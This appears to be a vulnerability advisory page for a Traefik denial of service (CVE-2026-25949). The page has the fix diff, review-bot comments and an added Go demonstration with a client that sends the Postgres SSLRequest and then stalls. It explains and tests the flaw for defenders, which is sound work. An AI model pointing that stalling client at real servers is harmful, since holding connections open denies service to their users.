High severity · NVD Advisory · Published Feb 12, 2026 · Updated Feb 12, 2026
Traefik: TCP readTimeout bypass via STARTTLS on Postgres
CVE-2026-25949
Description
Traefik is an HTTP reverse proxy and load balancer. Prior to 3.6.8, Traefik's handling of Postgres STARTTLS on TCP entrypoints lets an unauthenticated client bypass the entrypoint's respondingTimeouts.readTimeout: the client sends the 8-byte Postgres SSLRequest (STARTTLS) prelude and then stalls without sending the TLS ClientHello, and because the read deadline was already cleared at that point, the connection remains open indefinitely. Holding many such connections open leads to a denial of service. This vulnerability is fixed in 3.6.8.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| github.com/traefik/traefik/v3 (Go) | < 3.6.8 | 3.6.8 |
Patches
31e566e9f1d7 Remove conn deadline after STARTTLS negotiation
2 files changed · +17 −12
pkg/server/router/tcp/postgres.go+14 −6 modified@@ -7,6 +7,7 @@ import ( "io" "net" "sync" + "time" "github.com/rs/zerolog/log" tcpmuxer "github.com/traefik/traefik/v3/pkg/muxer/tcp" @@ -46,7 +47,7 @@ func isPostgres(br *bufio.Reader) (bool, error) { func (r *Router) servePostgres(conn tcp.WriteCloser) { _, err := conn.Write(PostgresStartTLSReply) if err != nil { - conn.Close() + _ = conn.Close() return } @@ -55,32 +56,39 @@ func (r *Router) servePostgres(conn tcp.WriteCloser) { b := make([]byte, len(PostgresStartTLSMsg)) _, err = br.Read(b) if err != nil { - conn.Close() + _ = conn.Close() return } hello, err := clientHelloInfo(br) if err != nil { - conn.Close() + _ = conn.Close() return } if !hello.isTLS { - conn.Close() + _ = conn.Close() return } + // The deadline was there to prevent hanging connections while waiting for the client, + // now that the STARTTLS message and Client Hello have been read, + // we can remove it and leave its handling to the TCP reverse proxy eventually. + if err := conn.SetDeadline(time.Time{}); err != nil { + log.Error().Err(err).Msg("Error while setting deadline") + } + connData, err := tcpmuxer.NewConnData(hello.serverName, conn, hello.protos) if err != nil { log.Error().Err(err).Msg("Error while reading TCP connection data") - conn.Close() + _ = conn.Close() return } // Contains also TCP TLS passthrough routes. handlerTCPTLS, _ := r.muxerTCPTLS.Match(connData) if handlerTCPTLS == nil { - conn.Close() + _ = conn.Close() return }
pkg/server/router/tcp/router.go+3 −6 modified@@ -126,11 +126,6 @@ func (r *Router) ServeTCP(conn tcp.WriteCloser) { } if postgres { - // Remove read/write deadline and delegate this to underlying TCP server. - if err := conn.SetDeadline(time.Time{}); err != nil { - log.Error().Err(err).Msg("Error while setting deadline") - } - r.servePostgres(r.GetConn(conn, getPeeked(br))) return } @@ -141,7 +136,9 @@ func (r *Router) ServeTCP(conn tcp.WriteCloser) { return } - // Remove read/write deadline and delegate this to underlying TCP server (for now only handled by HTTP Server) + // The deadline was set to avoid blocking on the initial read of the ClientHello, + // but now that we have it, we can remove it, + // and delegate this to underlying TCP server (for now only handled by HTTP Server). if err := conn.SetDeadline(time.Time{}); err != nil { log.Error().Err(err).Msg("Error while setting deadline") }
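Review bot: in the postgres.go hunk starting at `@@ -55,32 +56,39 @@`, the 8-byte STARTTLS message is consumed with `_, err = br.Read(b)`, and a single bufio.Reader.Read is only guaranteed to fill `b` when those bytes are already buffered; the new `conn.SetDeadline(time.Time{})` a few lines below is only sound once the whole prelude and the ClientHello have been read, so make that requirement explicit with `_, err = io.ReadFull(br, b)` (`io` is already imported in this file). Also, when `SetDeadline` fails the handler logs and carries on with the deadline still armed, which is the safe direction, but the message "Error while setting deadline" is the same text router.go logs, so add a field that names the STARTTLS path to keep the two apart in logs.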
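Review bot: the rewritten comment in the second router.go hunk still says the deadline is delegated "to underlying TCP server (for now only handled by HTTP Server)", while the new comment in servePostgres says handling is left "to the TCP reverse proxy eventually"; the two now name different owners for the post-handshake timeout, so align the wording in one place and state which component actually enforces a timeout after the ClientHello has been read.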
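Review bot: the patch changes only pkg/server/router/tcp/postgres.go and router.go (2 files changed, +17 −12) and ships no regression test for the ordering it fixes; a test that dials the entrypoint, writes PostgresStartTLSMsg, reads PostgresStartTLSReply, sends nothing further and asserts the connection is closed once the entrypoint readTimeout elapses would pin the new placement of `SetDeadline(time.Time{})` and would have caught the earlier placement in ServeTCP.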
Vulnerability mechanics
Traefik's TCP router arms the deadline that implements respondingTimeouts.readTimeout before it peeks at the first bytes of a connection to classify it. Before 3.6.8, ServeTCP cleared that deadline (conn.SetDeadline(time.Time{})) as soon as the peeked bytes matched the 8-byte Postgres SSLRequest, before servePostgres had sent the STARTTLS reply or read the TLS ClientHello. A client that sends only those 8 bytes and then stalls therefore sits in the ClientHello read with no deadline, and the connection is never reclaimed; an attacker can hold as many such connections as the entrypoint will accept. The fix (commit 31e566e9f1d7) removes the early SetDeadline in router.go and instead clears the deadline inside servePostgres only after the STARTTLS message and the ClientHello have been read, so a stalled client is cut off when readTimeout elapses, matching the ordering the plain TLS path already used.
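The ordering the patch changes, as an added example written for this page (not Traefik's code, though it follows the same peek, reply, read-ClientHello steps as servePostgres): a minimal server-side handler that takes either the pre-3.6.8 deadline placement or the fixed one, and the stalling client from the description. serveOne, stallAfterPrelude and RunScenario are this example's own names; the SSLRequest bytes follow the PostgreSQL wire protocol; the timeouts (200 ms readTimeout, 1 s stall) are constructed for the demonstration.

```go
// Added example, not Traefik's code: Postgres STARTTLS prelude handling with the
// pre-3.6.8 and the fixed deadline placement, plus the stalling client from the advisory.
package main

import (
	"bufio"
	"errors"
	"fmt"
	"io"
	"net"
	"time"
)

// pgSSLRequest is the 8-byte Postgres SSLRequest: int32 length 8, then code 80877103 (0x04D2162F).
var pgSSLRequest = []byte{0, 0, 0, 8, 0x04, 0xd2, 0x16, 0x2f}

// classify tells a deadline expiry ("deadline") apart from the peer going away ("client").
func classify(err error) string {
	var ne net.Error
	if errors.As(err, &ne) && ne.Timeout() {
		return "deadline"
	}
	return "client"
}

// serveOne accepts one connection and walks the prelude as the Traefik router does: peek,
// reply 'S', consume the 8 bytes, wait for the ClientHello. clearDeadlineEarly=true is the
// pre-3.6.8 ordering (deadline dropped once the prelude matches); false is the fixed ordering.
// It returns how the handler ended: "deadline", "client", "not-postgres" or "tls-ready".
func serveOne(ln net.Listener, readTimeout time.Duration, clearDeadlineEarly bool) string {
	conn, err := ln.Accept()
	if err != nil {
		return "accept-error"
	}
	defer conn.Close()
	_ = conn.SetDeadline(time.Now().Add(readTimeout)) // the entrypoint readTimeout
	br := bufio.NewReader(conn)
	prelude, err := br.Peek(len(pgSSLRequest))
	if err != nil {
		return classify(err)
	}
	if string(prelude) != string(pgSSLRequest) {
		return "not-postgres"
	}
	if clearDeadlineEarly {
		_ = conn.SetDeadline(time.Time{}) // VULNERABLE: the client may now stall forever
	}
	if _, err := conn.Write([]byte{'S'}); err != nil { // 'S' = server accepts TLS
		return classify(err)
	}
	_, _ = br.Discard(len(pgSSLRequest)) // consume the prelude (already buffered by Peek)
	if _, err := br.Peek(5); err != nil { // TLS record header; the stalling client never sends it
		return classify(err)
	}
	_ = conn.SetDeadline(time.Time{}) // FIXED ordering: drop the deadline only here
	return "tls-ready"
}

// stallAfterPrelude is the client from the advisory: send SSLRequest, take the 'S' reply,
// then send nothing for up to hold. It reports whether the server closed the connection.
func stallAfterPrelude(addr string, hold time.Duration) (bool, error) {
	conn, err := net.Dial("tcp", addr)
	if err != nil {
		return false, err
	}
	defer conn.Close()
	if _, err := conn.Write(pgSSLRequest); err != nil {
		return false, err
	}
	reply := make([]byte, 1)
	if _, err := io.ReadFull(conn, reply); err != nil || reply[0] != 'S' {
		return false, fmt.Errorf("unexpected STARTTLS reply %q: %v", reply, err)
	}
	_ = conn.SetReadDeadline(time.Now().Add(hold))
	_, err = conn.Read(reply) // ends only with EOF/reset (server closed) or our own timeout
	return classify(err) != "deadline", nil
}

// RunScenario runs one server ordering against the stalling client and returns how the
// server side ended and whether the client saw the connection closed within hold.
func RunScenario(clearDeadlineEarly bool, readTimeout, hold time.Duration) (string, bool, error) {
	ln, err := net.Listen("tcp", "127.0.0.1:0")
	if err != nil {
		return "", false, err
	}
	defer ln.Close()
	done := make(chan string, 1)
	go func() { done <- serveOne(ln, readTimeout, clearDeadlineEarly) }()
	closed, err := stallAfterPrelude(ln.Addr().String(), hold)
	if err != nil {
		return "", false, err
	}
	return <-done, closed, nil
}

func main() {
	for _, early := range []bool{true, false} {
		server, closed, err := RunScenario(early, 200*time.Millisecond, time.Second)
		fmt.Printf("clearDeadlineEarly=%v: server ended by %q, client saw close=%v, err=%v\n", early, server, closed, err)
	}
}
```

With the early clearing, serveOne only returns "client" once the stalling client gives up after the full hold, so the connection is held for as long as the attacker likes; with the fixed placement it returns "deadline" after readTimeout and the client observes EOF. The same stallAfterPrelude probe, pointed at a real TCP entrypoint, is a direct check of whether a deployment is patched: a connection that is still open well past the configured readTimeout means the bypass works.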
References
- github.com/advisories/GHSA-89p3-4642-cr2w (GitHub advisory database)
- nvd.nist.gov/vuln/detail/CVE-2026-25949 (NVD)
- github.com/traefik/traefik/commit/31e566e9f1d7888ccb6fbc18bfed427203c35678 (fix commit)
- github.com/traefik/traefik/releases/tag/v3.6.8 (release)
- github.com/traefik/traefik/security/advisories/GHSA-89p3-4642-cr2w (Traefik security advisory)